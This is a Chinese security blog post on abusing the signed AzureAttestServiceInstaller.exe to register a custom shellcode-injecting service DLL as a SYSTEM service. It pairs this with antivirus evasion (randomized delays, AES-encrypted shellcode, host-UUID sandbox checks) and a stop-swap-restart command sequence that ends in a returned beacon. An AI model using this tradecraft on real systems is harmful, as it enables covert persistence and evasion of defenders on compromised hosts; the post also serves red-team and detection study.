<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="利用Azure Attest Service持久化, Yang Hao&#39;s blog">
    <meta name="description" content="Yang Hao&#39;s blog">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->

<script async src="https://www.googletagmanager.com/gtag/js?id=G-KYC8PY5RS4"></script>
<script>
    window.dataLayer = window.dataLayer || [];
    function gtag() {
        dataLayer.push(arguments);
    }

    gtag('js', new Date());
    gtag('config', 'G-KYC8PY5RS4');
</script>


    <title>利用Azure Attest Service持久化 | Yang Hao&#39;s blog</title>
    <link rel="icon" type="image/x-icon, image/vnd.microsoft.icon" href="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/favicon.ico">

    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/lightGallery/css/lightgallery.min.css">
	
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/css/matery.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/css/my.css">
	
	<!--prism-->
	<link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/prism/prism.css">
    <script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/prism/prism.js" async ></script>


    <script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/jquery/jquery.min.js"></script>
	<script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/live2d-widget/autoload.js"></script>
<meta name="generator" content="Hexo 5.1.1"><link rel="alternate" href="/atom.xml" title="Yang Hao's blog" type="application/atom+xml">
</head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Yang Hao&#39;s blog</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="javascript:void(0);" class="waves-effect waves-light">

      
      <i class="fas fa-list" style="zoom: 0.6;"></i>
      
      <span>文章</span>
      <i class="fas fa-chevron-down" aria-hidden="true" style="zoom: 0.6;"></i>
    </a>
    <ul class="sub-nav menus_item_child ">
      
      <li>
        <a href="/tags">
          
          <i class="fas fa-tags" style="margin-top: -20px; zoom: 0.6;"></i>
          
          <span>标签</span>
        </a>
      </li>
      
      <li>
        <a href="/categories">
          
          <i class="fas fa-bookmark" style="margin-top: -20px; zoom: 0.6;"></i>
          
          <span>分类</span>
        </a>
      </li>
      
      <li>
        <a href="/archives">
          
          <i class="fas fa-archive" style="margin-top: -20px; zoom: 0.6;"></i>
          
          <span>归档</span>
        </a>
      </li>
      
    </ul>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Yang Hao&#39;s blog</div>
        <div class="logo-desc">
            
            Yang Hao&#39;s blog
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="javascript:;">
			
				<i class="fa-fw fas fa-list"></i>
			
			文章
			<span class="m-icon"><i class="fas fa-chevron-right"></i></span>
		</a>
            <ul  style="background:  ;" >
              
                <li>

                  <a href="/tags " style="margin-left:50px">
				  
				   <i class="fa fas fa-tags" style="position: absolute;left:28px" ></i>
			      
		          <span>标签</span>
                  </a>
                </li>
              
                <li>

                  <a href="/categories " style="margin-left:50px">
				  
				   <i class="fa fas fa-bookmark" style="position: absolute;left:28px" ></i>
			      
		          <span>分类</span>
                  </a>
                </li>
              
                <li>

                  <a href="/archives " style="margin-left:50px">
				  
				   <i class="fa fas fa-archive" style="position: absolute;left:28px" ></i>
			      
		          <span>归档</span>
                  </a>
                </li>
              
            </ul>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/medias/featureimages/17.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">利用Azure Attest Service持久化</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        margin: 35px 0 15px 0;
        padding-left: 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        height: calc(100vh - 250px);
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/LOLBAS/">
                                <span class="chip bg-color">LOLBAS</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/" class="post-category">
                                权限维持
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2022-08-29
                </div>
                

                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-check fa-fw"></i>更新日期:&nbsp;&nbsp;
                    2022-08-29
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    2.6k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    10 分
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">
        <div class="card-content article-card-content">
            <div id="articleContent">
                <h2 id="0x01-简介"><a href="#0x01-简介" class="headerlink" title="0x01 简介"></a>0x01 简介</h2><p><code>AzureAttestService</code>是安装<code>SQL Server 2019</code>后存在的服务，用于远程验证平台的可信度和其中运行的二进制文件的完整性，详细说明见 <a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-ca/azure/attestation/overview">Microsoft Azure Attestation</a>。<code>AzureAttestService</code>存在DLL类型服务文件<code>AzureAttestService.dll</code>和服务安装程序<code>AzureAttestServiceInstaller.exe</code>，可以通过服务安装程序对服务进行安装、启动停止和卸载。服务安装程序对DLL文件的验证存在问题，其未对要安装的服务DLL进行合法性检测，可将任意服务DLL安装为系统服务，通过这种方式可以绕过安全软件防御进行权限维持。本文测试系统环境为<code>WIN10 x64 1809</code>。</p>
<h2 id="0x02-服务程序测试"><a href="#0x02-服务程序测试" class="headerlink" title="0x02 服务程序测试"></a>0x02 服务程序测试</h2><p><code>AzureAttestServiceInstaller.exe</code> 和 <code>AzureAttestService.dll</code> 均是由微软签名的文件，其中<code>AzureAttestServiceInstaller.exe</code> 有4个参数用于服务的操作(-h):<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/2309fe408fa13ed263be8312c6403426.png"><br>其中 <code>-Install &lt;path to service dll&gt;</code>参数可以将DLL注册成为<code>svchost.exe</code>托管的<code>system</code>权限系统服务:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/28a51d2ef523b0fe915b05ae9060855d.png"><br>注册完成后可以在注册表<code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AzureAttestService</code> 项目中查询到对应注册信息:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/e72f7d2d72c069b195aad4ec652ff566.png"><br><code>Parameters</code>项中可查询服务DLL路径和导出函数信息:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/020f1cfe5dc64520b15d60b4d1b2de07.png"><br>因为<code>AzureAttestServiceInstaller.exe</code>可以将DLL注册为服务，那么可以编写一个服务类型DLL交给其注册即可。在实际利用中，如果直接使用自编写的服务DLL进行安装，安全软件可能会进行弹窗提醒，此时可以通过<code>AzureAttestServiceInstaller.exe</code>命令安装服务、停止服务后替换服务DLL达到绕过目的。在实践之前需要先编写一个DLL类型的服务。</p>
<h2 id="0x03-服务DLL编写"><a href="#0x03-服务DLL编写" class="headerlink" title="0x03 服务DLL编写"></a>0x03 服务DLL编写</h2><p>在DLL中实现服务的操作，需要具有一个导出函数并与注册表中的<br><code>ServiceMain</code>键值对应，以便<code>svchost.exe</code>执行，默认导出函数是<code>ServiceMain</code> 。查找到的代码示例有<code>MSDN</code>的<a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/windows/win32/services/writing-a-servicemain-function">编写ServiceMain函数</a>和<code>IRed</code>上的<a target="_blank" rel="noopener" href="https://www.ired.team/offensive-security/persistence/persisting-in-svchost.exe-with-a-service-dll-servicemain">Persisting in svchost.exe with a Service DLL</a>。如果要详细分析服务代码和各个参数作用可以参考《Windows核心编程》中Windows服务篇。本文仅对要编写的代码进行介绍，先需要在<code>ServiceMain</code>函数中通过<code>RegisterServiceCtrlHandler</code>注册一个回调函数来处理<code>SCM</code>的服务控制请求，如对服务的启动、停止等。因为需要通过 <code>AzureAttestServiceInstaller.exe</code> 来注册DLL服务的，所以在DLL中的<code>RegisterServiceCtrlHandler</code>函数第一个参数服务名称需要和该安装程序中默认的名称<code>AzureAttestService</code>保持一致 :<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/85f0982738ffd88bf71e2df08703b475.png"><br>在<code>dwServiceType</code>参数中设置<code>SERVICE_WIN32_SHARE_PROCESS</code>表示服务与其他服务可共享进程以便资源、环境变量等共享，一般宿主进程是<code>svchost.exe</code>。<br>接下来通过<code>ReportSvcStatus</code>向<code>SCM</code>返回服务状态，然后就进入用户处理函数<code>ExecuteServiceCode</code>。<code>IRed</code>的示例中是在<code>ExecuteServiceCode</code> 函数的合适位置执行持久化代码:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/04f8ed5853df44e07da560d024e9f499.png"><br>在这里执行执行代码时需要考虑到线程阻塞问题，如果直接使用指针方式<code>(*(void(*)())buffer)()</code>执行<code>shellcode</code>，会导致<code>SCM</code>无法正常对该服务进行控制。以下代码通过创建线程执行<code>shellcode</code>注入函数：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/7cdc30d346e654313d7d2b066dc8b12c.png"><br>注入<code>shellcode</code>时使用远程线程注入的方式进行，这样做可以让要执行的<code>shellcode</code>与当前<code>DLL</code>模块分离开，代码会在当前<code>svchost.exe</code>进程中分配空间执行:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/d6ff7a33f63fb74b0f213448cf3826b1.png"><br>编写完服务DLL代码后，以64位<code>Release</code>模式编译，得到一个服务DLL(<code>ServiceDLL.dll</code>):<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/6af66677e1210d98ef0939a686e5edac.png"><br>该DLL文件成功通过了<code>AzureAttestServiceInstaller.exe</code>的服务安装、启动、停止和卸载命令测试。为了在实际中使用该方法进行权限维持，还需对服务DLL使用必要的安全规避技术，如对<code>shellcode</code>进行编码或加密等。</p>
<h2 id="0x04-服务DLL安全规避"><a href="#0x04-服务DLL安全规避" class="headerlink" title="0x04 服务DLL安全规避"></a>0x04 服务DLL安全规避</h2><p>在本节中会使用随机延时，<code>shellcode</code>加密，主机指纹识别这三种方法来提高服务代码的安全软件规避能力。</p>
<h3 id="0x4-1-随机延时"><a href="#0x4-1-随机延时" class="headerlink" title="0x4-1 随机延时"></a>0x4-1 随机延时</h3><p>随机延时功能将注入<code>shellcode</code>的线程延后600~900秒执行，以争取安全软件扫描超时。在延时函数的选择上，不使用常见的<code>Sleep</code>函数进行延时，可以参考<a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/windows/win32/api/synchapi/">synchapi.h</a>头文件中的<code>API</code>函数，如下通过<code>WaitForSingleObject</code>进行5秒延时:</p>
<pre><code class="line-numbers language-c">&nbsp;HANDLE hProcess = GetCurrentProcess();
 // wait for 5 s
 DWORD dw = WaitForSingleObject(hProcess, 5000); </code></pre>
<p>有了延时函数后还需要一个随机数生成函数配合进行延时，在<code>MSDN</code>上搜索到相关函数<a target="_blank" rel="noopener" href="https://docs.microsoft.com/zh-cn/cpp/c-runtime-library/reference/rand?view=msvc-170">rand</a>的示例代码，改动部分代码后可以生成一个伪随机数(种子不变时，每次生成的随机数都一样):</p>
<pre><code class="line-numbers language-c">#include &lt;stdlib.h&gt; // rand(), srand()
#include &lt;stdio.h&gt; // printf()
int main(void)
{
    srand(882);
    int r = ((double)rand() / RAND_MAX) * static_cast&lt;__int64&gt;(10000 - 1000) + 1000;
    printf("%d\n", r);
}</code></pre>
<p><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/470c4511bb5b2cc10b2040cbe9d1884e.png"><br>为了让随机数种子随机一点，通过获取当前时间的毫秒数来设置种子，获取600-900之间的随机数：</p>
<pre><code class="line-numbers language-c">#include &lt;stdlib.h&gt; // rand(), srand()
#include &lt;stdio.h&gt; // printf()
int main(void)
{
    SYSTEMTIME stLocal;
    GetLocalTime(&amp;stLocal);
    printf("stLocal.wMilliseconds:%d\n", stLocal.wMilliseconds);
    srand(stLocal.wMilliseconds);
    int r = ((double)rand() / RAND_MAX) * static_cast&lt;__int64&gt;(900 - 600) + 600;
    printf("%d\n", r);
    return 0;
}</code></pre>
<p>发现这样实现的随机数好像都在700以下:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/3b25b494aab7a2a5e202ad38660e1ce8.png"><br>发现可以通过随机两次来获得比较随机的值:</p>
<pre><code class="line-numbers language-c">#include &lt;windows.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;stdio.h&gt; 
void RangedRandDemo(int range_min, int range_max, int n,int isrand,int* intWait)
{
    for (int i = 0; i &lt; n; i++)
    {
        *intWait = ((double)rand() / RAND_MAX) * (static_cast&lt;__int64&gt;(range_max) - static_cast&lt;__int64&gt;(range_min)) + range_min;
        printf("%6d\n", *intWait);
    }
}

int main(void)
{
    SYSTEMTIME stLocal;
    GetLocalTime(&amp;stLocal);
    printf("stLocal.wMilliseconds:%d\n", stLocal.wMilliseconds);
    srand(stLocal.wMilliseconds);
    int intWait = 600;
    RangedRandDemo(600,900,2, stLocal.wMilliseconds,&amp;intWait);
    printf("intWait:%d\n", intWait);
}</code></pre>
<p>现在执行结果如下，<code>intWait</code>即为我们需要等待的秒数:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/ae87f6bc872c632428f3c642811adfa5.png"><br>当<code>WaitForSingleObject</code>等待超时后即可执行操作:</p>
<pre><code class="line-numbers language-c">DWORD dw = WaitForSingleObject(GetCurrentProcess(), intWait * 1000);
if (WAIT_TIMEOUT == dw) {
printf("[+] Run my code");
}</code></pre>
<h3 id="0x4-2-Shellcode加密"><a href="#0x4-2-Shellcode加密" class="headerlink" title="0x4-2 Shellcode加密"></a>0x4-2 Shellcode加密</h3><p>一般来说将<code>shellcode</code>分离加载的规避效果要好于直接硬编码，该位置使用<code>AES</code>算法对原始<code>shellcode</code>文件进行加密，在加密后安全软件无法确定程序意图，之后在服务DLL中读取加密文件内容后<code>AES</code>解密执行。我们通过复用<a target="_blank" rel="noopener" href="https://github.com/slaeryan/AQUARMOURY/tree/master/Brownie">Brownie</a>中的<code>AES</code>相关代码来实现对<code>shellcode</code>的加解密，要注意在<code>char*</code>和<code>std::string</code> 类型转换时，如果存在<code>\x00</code>会导致截断，所以使用了C++ <code>string::assign()</code>方法赋值:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/814fdecbd6a5fbadf520929bb626f06c.png"><br>还需要注意的是，加密脚本中将<code>iv</code>值放在加密文件末尾，<code>API</code>函数<code>GetFileSize</code>在读取文件时如果在文件末尾存在<code>\x00</code>时会忽略该数据，导致读取到的数据大小与实际不符:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/8d79a84d4de481b1f62857ca791f4c9e.png"><br>在<code>AES</code>加密的<code>python</code>脚本中有对应注释:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/556ad86eef7152cb795be4f62e440426.png"><br>实际使用的是随机提取的<code>iv</code>值 <code>iv = Random.new().read(AES.block_size)</code>，在没完全理解该随机方法之前错误估计该值最后一位有几率取到<code>\x00</code>，改了下代码把最后一个元素设置为了固定值，导致了后续解密时一个<code>bug</code>产生:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/8b3df0ac769db69e25a02d59d8ca6096.png"><br>这样改动后解密出来的<code>shellcode</code>就有部分字节与源数据不一致:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/8a6050213176edd4eb743a85661ce55a.png"><br>意识到解密存在错误后，将加密代码恢复原样后，成功在测试程序中解密并执行了<code>shellcode</code>，同时<code>windows defender</code>保持静默:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/8239395a300f0663f1a4a9492c407103.png"></p>
<h3 id="0x4-3-主机指纹识别"><a href="#0x4-3-主机指纹识别" class="headerlink" title="0x4-3 主机指纹识别"></a>0x4-3 主机指纹识别</h3><p>在获得目标主机权限后需要获取其产品<code>uuid</code>，然后硬编码到服务DLL中用于和<code>WQL</code>查询得到的主机<code>uuid</code>信息对比，检测该主机是否为预设主机，以此规避沙箱环境。命令模式下可使用<code>wmic csproduct list full</code> 查询产品信息中的主机<code>uuid</code>:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/9f218be4c058f57bcec292172f125073.png"><br><code>GUI</code>下可使用<code>wbemtest</code>命令打开实用工具枚举实例 <code>Win32_ComputerSystemProduct</code>实例：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/4476fd316acf055b1b6961d79ebe1d8a.png"><br>DLL中通过<code>C++</code>使用<code>COM</code>编程执行<code>WQL</code>查询获取<code>uuid</code>的代码直接修改自<code>MSDN</code>上的示例<a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/windows/win32/wmisdk/example--getting-wmi-data-from-the-local-computer">wmi-data-from-the-local-computer</a>，需要查询<code>Win32_ComputerSystemProduct</code>类中<code>uuid</code>的值:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/6d3a8050f7dd8010e369680ca31896f3.png"><br>查询到结果后判断<code>uuid</code>是否与预设相等:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/cc18b51fc76c7d570367029a7391914d.png"><br>程序执行后成功确认了主机<code>uuid</code>:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/8b046305d10c4d1cab308cad74e7f469.png"><br>在测试程序中实现<code>uuid</code>检测后，需要将测试好的代码移植到服务DLL中，完成后运行测试发现一个之前遇到的<code>CoInitializeSecurity</code>已被调用问题，因为是在线程中进行<code>COM</code>调用，可能在之前已经有过<code>COM</code>调用，所以加入返回值判断即可：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/43ce3820b11d755af5eb27fc1c3bd664.png"><br>启动服务后查看写入的日志，发现已经成功执行<code>shellcode</code>:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/a546c838d919e7d060ab763873f43c79.png"><br>最后将官方<code>AzureAttestService.dll</code>(147kb)的资源信息也拷贝到自编写的服务DLL中(72kb):<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/ca52f6a5a785fc1875fa60dadfd03320.png"><br>这一步的规避措施就编写完毕了，接下来对服务DLL进行测试。</p>
<h2 id="0x05-安装服务DLL"><a href="#0x05-安装服务DLL" class="headerlink" title="0x05 安装服务DLL"></a>0x05 安装服务DLL</h2><p>在上文中已经编写好了服务类型DLL并使用了一些规避手段，直接通过安装程序命令安装服务:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/6531952218bd67047efd6a9052b9cc41.png"><br>在PID为1664的<code>svchost.exe</code>进程中成功执行了<code>shellcode</code>返回<code>beacon</code>:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/be155d973e5e5fcaaadbf0694e03dc40.png"><br>在实际利用过程中，如果直接将自编写的服务DLL进行注册，会被安全软件行为拦截:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/f7dae8d9b0b24f747e613dba309484d4.png"><br>所以应该先使用都具有签名的文件注册服务，然后停止服务并替换服务DLL文件。刚好签名文件<code>AzureAttestServiceInstaller.exe</code>提供了操作需要的命令：</p>
<pre><code class="line-numbers language-cmd">// 安装签名服务DLL
AzureAttestServiceInstaller.exe -Install AzureAttestService.dll
// 完成后停止服务，解除DLL文件占用
AzureAttestServiceInstaller.exe -StopService
// 替换服务DLL
move AzureAttestService.dll AzureAttestService.dll.bak
move ServiceDLL.dll AzureAttestService.dll
// 启动服务，执行恶意代码
AzureAttestServiceInstaller.exe -StartService</code></pre>
<p><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/8fba499cecad9cfdbf50b2652c69afea.png"><br>服务成功在PID为2920的<code>svchost.exe</code>中启动:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/666bb9e479c7f92b61249684cbae01fc.png"><br>之后成功返回了<code>beacon</code>:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/81e913d3e3668dda0e0726acfeb774fc.png"><br>最终我们可以在<code>windows defender</code>和数字卫士全家桶保护的主机中成功启动PID为428的<code>svchost</code>服务进程:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/8ee072f52acf82302d9e98d7d22cd617.png"><br>在等待一段时间之后，成功返回了<code>beacon</code>:<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2022_8/c3a88226cb0dddb5459fb05359924de9.png"></p>
<h2 id="0x06-文末总结"><a href="#0x06-文末总结" class="headerlink" title="0x06 文末总结"></a>0x06 文末总结</h2><p>本文记录了从发现<code>AzureAttestService</code>服务注册机制，提取出具有签名的服务安装程序和服务DLL，随后利用签名文件注册服务、停止服务绕过安全软件行为监控获得已创建完成的系统服务，再替换服务DLL文件获得持久化的过程。<br>在服务DLL中实现了代码加密，随机延迟，主机<code>uuid</code>检测等规避手段，绕过两种安全软件保护达到了在目标主机进行持久化效果。</p>
<h2 id="0x07-参考链接"><a href="#0x07-参考链接" class="headerlink" title="0x07 参考链接"></a>0x07 参考链接</h2><p><a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/windows/win32/services/writing-a-servicemain-function">writing-a-servicemain-function</a><br><a target="_blank" rel="noopener" href="https://www.ired.team/offensive-security/persistence/persisting-in-svchost.exe-with-a-service-dll-servicemain">persisting-in-svchost.exe-with-a-service-dll-servicemain</a><br><a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-ca/azure/attestation/overview">https://docs.microsoft.com/en-ca/azure/attestation/overview</a><br><a target="_blank" rel="noopener" href="https://github.com/slaeryan/AQUARMOURY/tree/master/Brownie">https://github.com/slaeryan/AQUARMOURY/tree/master/Brownie</a></p>
<script>
        document.querySelectorAll('.github-emoji')
          .forEach(el => {
            if (!el.dataset.src) { return; }
            const img = document.createElement('img');
            img.style = 'display:none !important;';
            img.src = el.dataset.src;
            img.addEventListener('error', () => {
              img.remove();
              el.style.color = 'inherit';
              el.style.backgroundImage = 'none';
              el.style.background = 'none';
            });
            img.addEventListener('load', () => {
              img.remove();
            });
            document.body.appendChild(img);
          });
      </script>
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">YangHao</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://yanghaoi.github.io/2022/08/29/li-yong-azureattestservice-chi-jiu-hua/">https://yanghaoi.github.io/2022/08/29/li-yong-azureattestservice-chi-jiu-hua/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">YangHao</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
